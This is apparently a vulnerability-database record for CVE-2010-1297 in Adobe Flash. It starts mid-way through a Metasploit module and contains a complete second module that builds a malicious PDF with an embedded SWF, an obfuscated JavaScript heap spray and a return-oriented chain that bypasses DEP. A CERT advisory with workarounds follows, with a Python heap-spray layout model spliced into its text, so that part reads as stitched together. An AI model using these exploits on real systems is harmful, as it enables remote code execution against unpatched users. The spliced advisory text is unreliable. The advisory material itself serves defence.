pdf.length\n pdf << io_def(5) << n_obfu(\"<</Type/Action/S/JavaScript/JS \") + io_ref(6) + \">>\" << eol << endobj\n\n # js stream\n xref << pdf.length\n compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))\n pdf << io_def(6) << n_obfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\n pdf << \"stream\" << eol\n pdf << compressed << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n # swf annotation object\n xref << pdf.length\n pdf << io_def(7) << n_obfu(\"<</Type/Annot/Subtype/RichMedia\")\n pdf << n_obfu(\"/Rect [20 20 187 69] \")\n pdf << n_obfu(\"/RichMediaSettings \") << io_ref(8)\n pdf << n_obfu(\"/RichMediaContent \") << io_ref(9)\n pdf << n_obfu(\"/NM (\") << swf_name << n_obfu(\")\")\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # rich media settings\n xref << pdf.length\n pdf << io_def(8)\n pdf << n_obfu(\"<</Type/RichMediaSettings/Subtype/Flash\")\n pdf << n_obfu(\"/Activation \") << io_ref(10)\n pdf << n_obfu(\"/Deactivation \") << io_ref(11)\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # rich media content\n xref << pdf.length\n pdf << io_def(9)\n pdf << n_obfu(\"<</Type/RichMediaContent\")\n pdf << n_obfu(\"/Assets \") << io_ref(12)\n pdf << n_obfu(\"/Configurations [\") << io_ref(14) << \"]\"\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # rich media activation / deactivation\n xref << pdf.length\n pdf << io_def(10)\n pdf << n_obfu(\"<</Type/RichMediaActivation/Condition/PO>>\")\n pdf << eol << endobj\n\n xref << pdf.length\n pdf << io_def(11)\n pdf << n_obfu(\"<</Type/RichMediaDeactivation/Condition/XD>>\")\n pdf << eol << endobj\n\n # rich media assets\n xref << pdf.length\n pdf << io_def(12)\n pdf << n_obfu(\"<</Names [(#{swf_name}) \") << io_ref(13) << n_obfu(\"]>>\")\n pdf << eol << endobj\n\n # swf embeded file ref\n xref << pdf.length\n pdf << io_def(13)\n pdf << n_obfu(\"<</Type/Filespec /EF <</F \") << io_ref(16) << n_obfu(\">> /F(#{swf_name})>>\")\n pdf << eol << 
endobj\n\n # rich media configuration\n xref << pdf.length\n pdf << io_def(14)\n pdf << n_obfu(\"<</Type/RichMediaConfiguration/Subtype/Flash\")\n pdf << n_obfu(\"/Instances [\") << io_ref(15) << n_obfu(\"]>>\")\n pdf << eol << endobj\n\n # rich media isntance\n xref << pdf.length\n pdf << io_def(15)\n pdf << n_obfu(\"<</Type/RichMediaInstance/Subtype/Flash\")\n pdf << n_obfu(\"/Asset \") << io_ref(13)\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # swf stream\n # NOTE: This data is already compressed, no need to compress it again...\n xref << pdf.length\n pdf << io_def(16) << n_obfu(\"<</Type/EmbeddedFile/Length %s>>\" % swf.length) << eol\n pdf << \"stream\" << eol\n pdf << swf << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n # trailing stuff\n xrefPosition = pdf.length\n pdf << \"xref\" << eol\n pdf << \"0 %d\" % (xref.length + 1) << eol\n pdf << \"0000000000 65535 f\" << eol\n xref.each do |index|\n pdf << \"%010d 00000 n\" % index << eol\n end\n\n pdf << \"trailer\" << eol\n pdf << n_obfu(\"<</Size %d/Root \" % (xref.length + 1)) << io_ref(1) << \">>\" << eol\n\n pdf << \"startxref\" << eol\n pdf << xrefPosition.to_s() << eol\n\n pdf << \"%%EOF\" << eol\n pdf\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb"}, {"lastseen": "2020-08-27T01:47:31", "description": "This module exploits a vulnerability in the DoABC tag handling within versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also vulnerable, as are any other applications that may embed Flash player. Arbitrary code execution is achieved by embedding a specially crafted Flash movie into a PDF document. An AcroJS heap spray is used in order to ensure that the memory used by the invalid pointer issue is controlled. 
NOTE: This module uses a similar DEP bypass method to that used within the adobe_libtiff module. This method is unlikely to work across various Windows versions due a hardcoded syscall number.\n", "published": "2010-06-10T20:28:05", "type": "metasploit", "title": "Adobe Flash Player \"newfunction\" Invalid Pointer Use", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1297"], "modified": "2017-09-09T02:19:55", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_FLASHPLAYER_NEWFUNCTION", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe Flash Player \"newfunction\" Invalid Pointer Use',\n 'Description' => %q{\n This module exploits a vulnerability in the DoABC tag handling within\n versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also\n vulnerable, as are any other applications that may embed Flash player.\n\n Arbitrary code execution is achieved by embedding a specially crafted Flash\n movie into a PDF document. An AcroJS heap spray is used in order to ensure\n that the memory used by the invalid pointer issue is controlled.\n\n NOTE: This module uses a similar DEP bypass method to that used within the\n adobe_libtiff module. 
This method is unlikely to work across various\n Windows versions due a hardcoded syscall number.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Found being openly exploited\n 'jduck' # Metasploit version\n ],\n 'References' =>\n [\n ['CVE', '2010-1297'],\n ['OSVDB', '65141'],\n ['BID', '40586'],\n ['URL', 'http://www.adobe.com/support/security/advisories/apsa10-01.html'],\n # For SWF->PDF embedding\n ['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'HTTP::compression' => 'gzip',\n 'HTTP::chunked' => true,\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Payload' =>\n {\n 'Space' => 1000,\n 'BadChars' => \"\\x00\",\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # Tested OK via Adobe Reader 9.3.0 on Windows XP SP3 (uses flash 10.0.42.34) -jjd\n # Tested OK via Adobe Reader 9.3.1 on Windows XP SP3 (uses flash 10.0.45.2) -jjd\n # Tested OK via Adobe Reader 9.3.2 on Windows XP SP3 (uses flash 10.0.45.2) -jjd\n [ 'Automatic', { }],\n ],\n 'DisclosureDate' => 'Jun 04 2010',\n 'DefaultTarget' => 0))\n end\n\n def exploit\n # load the static swf file\n path = File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2010-1297.swf\" )\n fd = File.open( path, \"rb\" )\n @swf_data = fd.read(fd.stat.size)\n fd.close\n\n super\n end\n\n def on_request_uri(cli, request)\n\n print_status(\"Sending crafted PDF w/SWF\")\n\n js_data = make_js(regenerate_payload(cli).encoded)\n pdf_data = make_pdf(@swf_data, js_data)\n send_response(cli, pdf_data, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' })\n\n # Handle the payload\n handler(cli)\n end\n\n\n def make_js(encoded_payload)\n\n # The following executes a ret2lib using BIB.dll\n # The effect is to bypass DEP and execute the shellcode in an indirect way\n stack_data = [\n 0xc0c0c0c,\n 0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret\n 
0xcccccccc,\n 0x70048ef, # xchg eax,esp / ret\n 0x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8]\n 0xcccccccc,\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009033, # ret 0x18\n 0x7009084, # ret\n 0xc0c0c0c,\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7001599, # pop ebp / ret\n 0x10124,\n 0x70072f7, # pop eax / ret\n 0x10104,\n 0x70015bb, # pop ecx / ret\n 0x1000,\n 0x700154d, # mov [eax], ecx / ret\n 0x70015bb, # pop ecx / ret\n 0x7ffe0300, # -- location of KiFastSystemCall\n 0x7007fb2, # mov eax, [ecx] / ret\n 0x70015bb, # pop ecx / ret\n 0x10011,\n 0x700a8ac, # mov [ecx], eax / xor eax,eax / ret\n 0x70015bb, # pop ecx / ret\n 0x10100,\n 0x700a8ac, # mov [ecx], eax / xor eax,eax / ret\n 0x70072f7, # pop eax / ret\n 0x10011,\n 0x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?)\n 0x7005c54, # pop esi / add esp,0x14 / ret\n 0xffffffff,\n 0x10100,\n 0x0,\n 0x10104,\n 0x1000,\n 0x40,\n # The next bit effectively copies data from the interleaved stack to the memory\n # pointed to by eax\n # The data copied is:\n # \\x5a\\x90\\x54\\x90\\x5a\\xeb\\x15\\x58\\x8b\\x1a\\x89\\x18\\x83\\xc0\\x04\\x83\n # \\xc2\\x04\\x81\\xfb\\x0c\\x0c\\x0c\\x0c\\x75\\xee\\xeb\\x05\\xe8\\xe6\\xff\\xff\n # \\xff\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xff\\xff\\xff\\x90\n 0x700d731, # mov eax, [ebp-0x24] / ret\n 0x70015bb, # pop ecx / ret\n 0x9054905a,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x5815eb5a,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x18891a8b,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x8304c083,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop 
ecx / ret\n 0xfb8104c2,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0xc0c0c0c,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x5ebee75,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0xffffe6e8,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x909090ff,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x90909090,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x90909090,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x90ffffff,\n 0x700154d, # mov [eax], ecx / ret\n 0x700d731, # mov eax, [ebp-0x24] / ret\n 0x700112f # call eax -- (execute stub to transition to full shellcode)\n ].pack('V*')\n\n var_unescape = rand_text_alpha(rand(100) + 1)\n var_shellcode = rand_text_alpha(rand(100) + 1)\n\n var_start = rand_text_alpha(rand(100) + 1)\n\n var_s = 0x10000\n var_c = rand_text_alpha(rand(100) + 1)\n var_b = rand_text_alpha(rand(100) + 1)\n var_d = rand_text_alpha(rand(100) + 1)\n var_3 = rand_text_alpha(rand(100) + 1)\n var_i = rand_text_alpha(rand(100) + 1)\n var_4 = rand_text_alpha(rand(100) + 1)\n\n payload_buf = ''\n payload_buf << stack_data\n payload_buf << encoded_payload\n\n escaped_payload = Rex::Text.to_unescape(payload_buf)\n\n js = %Q|\nvar #{var_unescape} = unescape;\nvar #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );\nvar #{var_c} = #{var_unescape}( \"%\" + \"u\" + \"0\" + \"c\" + \"0\" + \"c\" + \"%u\" + \"0\" + \"c\" + \"0\" + \"c\" );\nwhile (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};\n#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);\n#{var_b} += #{var_shellcode};\n#{var_b} += #{var_c};\n#{var_d} = #{var_b}.substring(0, #{var_s}/2);\nwhile(#{var_d}.length < 
0x80000) #{var_d} += #{var_d};\n#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);\nvar #{var_4} = new Array();\nfor (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+\"s\";\n|\n\n js\n end\n\n def random_non_ascii_string(count)\n result = \"\"\n count.times do\n result << (rand(128) + 128).chr\n end\n result\n end\n\n def io_def(id)\n \"%d 0 obj\\n\" % id\n end\n\n def io_ref(id)\n \"%d 0 R\" % id\n end\n\n\n #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\n def n_obfu(str)\n result = \"\"\n str.scan(/./u) do |c|\n if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\n result << \"#%x\" % c.unpack(\"C*\")[0]\n else\n result << c\n end\n end\n result\n end\n\n\n def ascii_hex_whitespace_encode(str)\n result = \"\"\n whitespace = \"\"\n str.each_byte do |b|\n result << whitespace << \"%02x\" % b\n whitespace = \" \" * (rand(3) + 1)\n end\n result << \">\"\n end\n\n\n def make_pdf(swf, js)\n\n swf_name = rand_text_alpha(8 + rand(8)) + \".swf\"\n\n xref = []\n eol = \"\\n\"\n endobj = \"endobj\" << eol\n\n # Randomize PDF version?\n pdf = \"%PDF-1.5\" << eol\n #pdf << \"%\" << random_non_ascii_string(4) << eol\n\n # catalog\n xref << pdf.length\n pdf << io_def(1) << n_obfu(\"<</Type/Catalog\")\n pdf << n_obfu(\"/Pages \") << io_ref(3)\n pdf << n_obfu(\"/OpenAction \") << io_ref(5)\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # pages array\n xref << pdf.length\n pdf << io_def(3) << n_obfu(\"<</Type/Pages/Count 1/Kids [\") << io_ref(4) << n_obfu(\"]>>\") << eol << endobj\n\n # page 1\n xref << pdf.length\n pdf << io_def(4) << n_obfu(\"<</Type/Page/Parent \") << io_ref(3)\n pdf << n_obfu(\"/Annots [\") << io_ref(7) << n_obfu(\"] \")\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # js action\n xref << pdf.length\n pdf << io_def(5) << n_obfu(\"<</Type/Action/S/JavaScript/JS \") + io_ref(6) + \">>\" << eol << endobj\n\n # js stream\n xref << pdf.length\n compressed = 
Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))\n pdf << io_def(6) << n_obfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\n pdf << \"stream\" << eol\n pdf << compressed << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n # swf annotation object\n xref << pdf.length\n pdf << io_def(7) << n_obfu(\"<</Type/Annot/Subtype/RichMedia\")\n pdf << n_obfu(\"/Rect [20 20 187 69] \")\n pdf << n_obfu(\"/RichMediaSettings \") << io_ref(8)\n pdf << n_obfu(\"/RichMediaContent \") << io_ref(9)\n pdf << n_obfu(\"/NM (\") << swf_name << n_obfu(\")\")\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # rich media settings\n xref << pdf.length\n pdf << io_def(8)\n pdf << n_obfu(\"<</Type/RichMediaSettings/Subtype/Flash\")\n pdf << n_obfu(\"/Activation \") << io_ref(10)\n pdf << n_obfu(\"/Deactivation \") << io_ref(11)\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # rich media content\n xref << pdf.length\n pdf << io_def(9)\n pdf << n_obfu(\"<</Type/RichMediaContent\")\n pdf << n_obfu(\"/Assets \") << io_ref(12)\n pdf << n_obfu(\"/Configurations [\") << io_ref(14) << \"]\"\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # rich media activation / deactivation\n xref << pdf.length\n pdf << io_def(10)\n pdf << n_obfu(\"<</Type/RichMediaActivation/Condition/PO>>\")\n pdf << eol << endobj\n\n xref << pdf.length\n pdf << io_def(11)\n pdf << n_obfu(\"<</Type/RichMediaDeactivation/Condition/XD>>\")\n pdf << eol << endobj\n\n # rich media assets\n xref << pdf.length\n pdf << io_def(12)\n pdf << n_obfu(\"<</Names [(#{swf_name}) \") << io_ref(13) << n_obfu(\"]>>\")\n pdf << eol << endobj\n\n # swf embeded file ref\n xref << pdf.length\n pdf << io_def(13)\n pdf << n_obfu(\"<</Type/Filespec /EF <</F \") << io_ref(16) << n_obfu(\">> /F(#{swf_name})>>\")\n pdf << eol << endobj\n\n # rich media configuration\n xref << pdf.length\n pdf << io_def(14)\n pdf << n_obfu(\"<</Type/RichMediaConfiguration/Subtype/Flash\")\n pdf << n_obfu(\"/Instances 
[\") << io_ref(15) << n_obfu(\"]>>\")\n pdf << eol << endobj\n\n # rich media isntance\n xref << pdf.length\n pdf << io_def(15)\n pdf << n_obfu(\"<</Type/RichMediaInstance/Subtype/Flash\")\n pdf << n_obfu(\"/Asset \") << io_ref(13)\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # swf stream\n # NOTE: This data is already compressed, no need to compress it again...\n xref << pdf.length\n pdf << io_def(16) << n_obfu(\"<</Type/EmbeddedFile/Length %s>>\" % swf.length) << eol\n pdf << \"stream\" << eol\n pdf << swf << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n # trailing stuff\n xrefPosition = pdf.length\n pdf << \"xref\" << eol\n pdf << \"0 %d\" % (xref.length + 1) << eol\n pdf << \"0000000000 65535 f\" << eol\n xref.each do |index|\n pdf << \"%010d 00000 n\" % index << eol\n end\n\n pdf << \"trailer\" << eol\n pdf << n_obfu(\"<</Size %d/Root \" % (xref.length + 1)) << io_ref(1) << \">>\" << eol\n\n pdf << \"startxref\" << eol\n pdf << xrefPosition.to_s() << eol\n\n pdf << \"%%EOF\" << eol\n pdf\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb"}], "cert": [{"lastseen": "2020-09-18T20:42:04", "bulletinFamily": "info", "cvelist": ["CVE-2010-1297"], "description": "### Overview \n\nAdobe Flash contains a vulnerability in the handling of the ActionScript newfunction instruction, which can allow a remote, unauthenticated attacker to execute arbitrary code.\n\n### Description \n\nAdobe Flash 9 and later versions support ActionScript 3, which is executed by the ActionScript Virtual Machine 2 (AVM2). The AVM2 takes ActionScript Bytecode (ABC) as input, and it is just-in-time (JIT) compiled into processor-specific instructions. Certain malformed use of the AVM2 newfunction instruction can result in an exploitable crash. This vulnerability affects Flash Player 9 through 10.0.45.2. 
Adobe Reader 9, Acrobat 9, and other Adobe products (including Photoshop CS3, PhotoShop Lightroom, Freehand MX, Fireworks) provide Flash support independent of Flash Player.\n\nThis vulnerability is being exploited in the wild. Exploit code for this vulnerability is publicly available. \n \n--- \n \n### Impact \n\nBy convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), PDF file, Microsoft Office document, or any other document that supports embedded SWF content, an attacker may be able to execute arbitrary code. \n \n--- \n \n### Solution \n\n**Apply an update** \n \nThis vulnerability is addressed in Flash 10.1. Please see Adobe Security Bulletin [APSB10-14](<http://www.adobe.com/support/security/bulletins/apsb10-14.html>) for more details. \n \n--- \n \n**Disable Flash in your web browser** \n \nDisable Flash or selectively enable Flash content as described in [Securing Your Web Browser](<http://www.us-cert.gov/reading_room/securing_browser/>). \n \n**Disable Flash and 3D & Multimedia support in Adobe Reader 9** \n \nFlash and 3D & Multimedia support are implemented as plug-in libraries in Adobe Reader. Disabling Flash in Adobe Reader will only mitigate attacks using an SWF embedded in a PDF file. Disabling 3D & Multimedia support does not directly address the vulnerability, but it does provide additional mitigation and results in a more user-friendly error message instead of a crash. 
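The JavaScript heap spray in the Metasploit module above (the `var_c`, `var_b`, `var_d` and `var_3` string arithmetic) is easier to reason about in bytes. The following Python is an added example written for this page, not code from the module, Metasploit or Adobe: it mirrors that arithmetic byte for byte (JavaScript string lengths are UTF-16 units, so every JS length is doubled) and then checks where the ROP stack and payload land relative to the 0x0c0c0c0c pivot address. The 0x24 that the JS subtracts is assumed here, as in the module, to be the distance between a string allocation's start and its character data, and the reason given for the 0x1018-byte trim is likewise an assumption; the payload bytes are constructed stand-ins, not a real ROP chain.

```python
# Added example for this page (not Metasploit's code): byte-level model of the
# heap-spray string arithmetic in the adobe_flashplayer_newfunction JavaScript.
PIVOT = 0x0C0C0C0C      # address the corrupted pointer / stack pivot ends up at
STRING_HEADER = 0x24    # assumed: bytes from a JS string allocation's start to its
                        # character data (the 0x24 the module subtracts)
UNIT = 0x10000          # var_s: the 64 KiB repeating unit, in bytes
BLOCK_UNITS = 0x80000   # var_d target length in UTF-16 units (1 MiB of bytes)
TRIM = 0x1020 - 0x08    # bytes shaved off each block; assumed to keep the block plus
                        # its allocation overhead inside 1 MiB


def build_block(payload: bytes) -> bytes:
    """Mirror of the module's JS, with lengths converted from UTF-16 units to bytes:
       c  = unescape('%u0c0c%u0c0c'); while (c.length + 20 + 8 < s) c += c;
       b  = c.substring(0, (0x0c0c - 0x24) / 2) + shellcode + c;
       d  = b.substring(0, s / 2); while (d.length < 0x80000) d += d;
       x3 = d.substring(0, 0x80000 - (0x1020 - 8) / 2);  arr[i] = x3 + 's';"""
    c = b"\x0c\x0c\x0c\x0c"
    while len(c) // 2 + 20 + 8 < UNIT:
        c += c                                    # 0x0c bytes double as a sled:
    b = c[:0x0C0C - STRING_HEADER] + payload + c  # '0C 0C' decodes as 'or al, 0x0c'
    d = b[:UNIT]                                  # one 64 KiB unit: sled, payload, sled
    while len(d) // 2 < BLOCK_UNITS:
        d += d                                    # 16 units per 1 MiB block
    # the module appends 's' so each array element is a fresh string, not a shared slice
    return d[:BLOCK_UNITS * 2 - TRIM] + b"s\x00"


def payload_offsets(block: bytes, payload: bytes) -> list:
    """Byte offsets inside one block at which the payload starts."""
    offs, i = [], block.find(payload)
    while i != -1:
        offs.append(i)
        i = block.find(payload, i + 1)
    return offs


def pivot_hits_payload(alloc_base: int, block: bytes, payload: bytes) -> bool:
    """True if, with the block allocated at alloc_base, PIVOT points at the first
    payload byte.  Any 64 KiB-aligned base works, because the payload repeats
    every UNIT bytes at offset 0x0c0c - STRING_HEADER."""
    off = PIVOT - (alloc_base + STRING_HEADER)
    return 0 <= off < len(block) and block[off:off + len(payload)] == payload


def demo() -> dict:
    """Constructed stand-in for stack_data + encoded payload (not a real chain)."""
    payload = bytes(range(0x41, 0x5B)) + bytes(range(0x61, 0x7B))   # 'A..Za..z'
    block = build_block(payload)
    return {
        "block_len": len(block),
        "offsets": payload_offsets(block, payload),
        "aligned_base_hits": pivot_hits_payload(0x0C0C0000, block, payload),
        "lower_aligned_base_hits": pivot_hits_payload(0x0C0B0000, block, payload),
        "misaligned_base_hits": pivot_hits_payload(0x0C0C0100, block, payload),
    }


if __name__ == "__main__":
    r = demo()
    print("block bytes: 0x%x" % r["block_len"])
    print("payload at:  " + ", ".join("0x%x" % o for o in r["offsets"]))
    print("pivot lands on payload from a 64 KiB-aligned base: %s" % r["aligned_base_hits"])
```

The model shows why the module subtracts 0x24 and repeats a 64 KiB unit: as long as the spray's 1 MiB strings are laid out on 64 KiB boundaries, 0x0c0c0c0c falls 0x0c0c bytes into some unit, which is exactly where the ROP stack begins, and the 0x0c sled on either side absorbs any smaller misalignment only if the pivot lands in the sled rather than past the payload.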
\n \nTo disable Flash and 3D & Multimedia support in Adobe Reader 9 on Microsoft Windows, delete or rename these files: \n \n`\"%ProgramFiles%\\Adobe\\Reader 9.0\\Reader\\authplay.dll\"` \n`\"%ProgramFiles%\\Adobe\\Reader 9.0\\Reader\\rt3d.dll\"` \n \nFor Apple Mac OS X, delete or rename these files: \n \n`\"/Applications/Adobe Reader 9/Adobe Reader.app/Contents/Frameworks/AuthPlayLib.bundle\"` \n`\"/Applications/Adobe Reader 9/Adobe Reader.app/Contents/Frameworks/Adobe3D.framework\"` \n \nFor GNU/Linux, delete or rename these files (locations may vary among distributions): \n \n`\"/opt/Adobe/Reader9/Reader/intellinux/lib/libauthplay.so\"` \n`\"/opt/Adobe/Reader9/Reader/intellinux/lib/librt3d.so\"` \n \nFile locations may be different for Adobe Acrobat or other Adobe products that include Flash and 3D & Multimedia support. Disabling these plug-ins will reduce functionality and will not protect against SWF files hosted on websites. Depending on the update schedule for products other than Flash Player, consider leaving Flash and 3D & Multimedia support disabled unless they are absolutely required. \n \n**Remove Flash** \n \nAdobe has provided a [TechNote](<http://kb2.adobe.com/cps/141/tn_14157.html>) with utilities for uninstalling the Flash Player plug-in and ActiveX control on Windows and Mac OS X systems. Removing these components can mitigate the web browser attack vector for this vulnerability. Note that this will not remove the instances of Flash Player that are installed with Adobe Reader 9 or other Adobe products. \n \n**Enable DEP in Microsoft Windows** \n \nConsider enabling Data Execution Prevention (DEP) in supported versions of Windows. DEP should not be treated as a complete workaround, but it can mitigate the execution of attacker-supplied code in some cases. 
Microsoft has published detailed technical information about DEP in Security Research & Defense blog posts \"Understanding DEP as a mitigation technology\" [part 1](<http://blogs.technet.com/srd/archive/2009/06/05/understanding-dep-as-a-mitigation-technology-part-1.aspx>) and [part 2](<http://blogs.technet.com/srd/archive/2009/06/12/understanding-dep-as-a-mitigation-technology-part-2.aspx>). Use of DEP should be considered in conjunction with the application of patches or other mitigations described in this document. Note that both exploits on this page already carry a return-oriented chain to get past DEP (a VirtualProtect chain in the Abysssec generator, a VirtualAlloc chain in the Metasploit module), so DEP on its own is defence in depth, not a fix. \n \n**Disable JavaScript in Adobe Reader and Acrobat** \n \nDisabling JavaScript can help mitigate some techniques that use Adobe Reader as an attack vector. \n \nTo disable JavaScript in Adobe Reader: \n\n\n 1. Open Adobe Acrobat Reader.\n 2. Open the `Edit` menu.\n 3. Choose the `Preferences...` option.\n 4. Choose the `JavaScript` section.\n 5. Uncheck the `Enable Acrobat JavaScript` checkbox.\n\nDisabling JavaScript will not resolve the vulnerability; it only removes the JavaScript that the public exploits use to spray the heap, while the Flash parsing bug itself stays reachable through an embedded SWF. When JavaScript is disabled, Adobe Reader and Acrobat prompt to re-enable JavaScript when opening a PDF that contains JavaScript. \n \n**Prevent Internet Explorer from automatically opening PDF documents** \n \nThe installer for Adobe Reader and Acrobat configures Internet Explorer to automatically open PDF files without any user interaction. This behavior can be reverted to the safer option of prompting the user by importing the following as a .REG file: \n \n`Windows Registry Editor Version 5.00` \n \n`[HKEY_CLASSES_ROOT\\AcroExch.Document.7]` \n`\"EditFlags\"=hex:00,00,00,00` \n \n**Disable the displaying of PDF documents in the web browser** \n \nPreventing PDF documents from opening inside a web browser reduces the attack surface. If this workaround is applied to updated versions of Adobe Reader and Acrobat, it may protect against future vulnerabilities. 
\n \nTo prevent PDF documents from automatically being opened in a web browser with Adobe Reader: \n\n\n 1. Open Adobe Acrobat Reader.\n 2. Open the `Edit` menu.\n 3. Choose the `Preferences...` option.\n 4. Choose the `Internet` section.\n 5. Uncheck the `Display PDF in browser` checkbox. \n--- \n \n### Vendor Information\n\nVU#486225\n\n### Adobe\n\nNotified: January 25, 2010 Updated: June 10, 2010 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThis vulnerability is addressed in Flash 10.1. Please see Adobe Security Bulletin [APSB10-14](<http://www.adobe.com/support/security/bulletins/apsb10-14.html>) for more details.\n\n### Vendor References\n\n * <http://www.adobe.com/support/security/bulletins/apsb10-14.html>\n * <http://www.adobe.com/support/security/advisories/apsa10-01.html>\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 9 | AV:N/AC:M/Au:N/C:C/I:C/A:P \nTemporal | 7 | E:POC/RL:OF/RC:C \nEnvironmental | 7 | CDP:ND/TD:ND/CR:ND/IR:ND/AR:ND \n\n### References \n\n * <http://www.adobe.com/support/security/bulletins/apsb10-14.html>\n * <http://www.adobe.com/support/security/advisories/apsa10-01.html>\n * <http://www.adobe.com/devnet/actionscript/articles/avm2overview.pdf>\n * <http://labs.adobe.com/technologies/flashplayer10/>\n * <http://blog.zynamics.com/2010/06/09/analyzing-the-currently-exploited-0-day-for-adobe-reader-and-adobe-flash/>\n * <http://www.symantec.com/connect/blogs/analysis-zero-day-exploit-adobe-flash-and-reader>\n * <http://community.websense.com/blogs/securitylabs/archive/2010/06/09/having-fun-with-adobe-0-day-exploits.aspx>\n * <http://secunia.com/advisories/40026>\n * 
